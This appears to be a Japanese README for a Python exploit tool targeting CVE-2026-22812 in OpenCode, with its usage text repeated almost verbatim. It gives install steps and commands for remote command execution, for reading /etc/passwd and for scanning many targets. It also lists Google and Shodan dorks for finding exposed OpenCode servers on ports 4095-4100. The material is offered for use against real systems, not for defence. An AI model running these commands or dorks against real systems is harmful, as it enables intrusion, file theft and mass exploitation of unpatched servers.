
Pythonツールで、OpenCodeのCVE-2026-22812をチェック・悪用するためのもので、コマンド実行、ファイル読み取り、ポート4095〜4100での複数ターゲットスキャンをサポートします。
OpenCode CVE-2026-22812 エクスプロイター OpenCode の脆弱性(CVE-2026-22812)をチェック・悪用するためのシンプルな Python ツール。
インストール
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
基本的な使い方
# 単一ターゲットのチェック
python rce.py -u http://target:4096 --check
# コマンド実行
python rce.py -u http://target:4096 -c "whoami"
# ファイル読み取り
python rce.py -u http://target:4096 --read-file /etc/passwd
# 複数ターゲットのスキャン
python rce.py -l targets.txt --check
# その他
python rce.py --help
検索ドーク
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
デフォルトポート: 4095-4100
OpenCode の脆弱性(CVE-2026-22812)をチェック・悪用するためのシンプルな Python ツール。
インストール:
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
基本的な使い方
# 単一ターゲットのチェック
python rce.py -u http://target:4096 --check
# コマンド実行
python rce.py -u http://target:4096 -c "whoami"
# ファイル読み取り
python rce.py -u http://target:4096 --read-file /etc/passwd
# 複数ターゲットのスキャン
python rce.py -l targets.txt --check
# その他
検索ドーク:
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
デフォルトポート: 4095-4100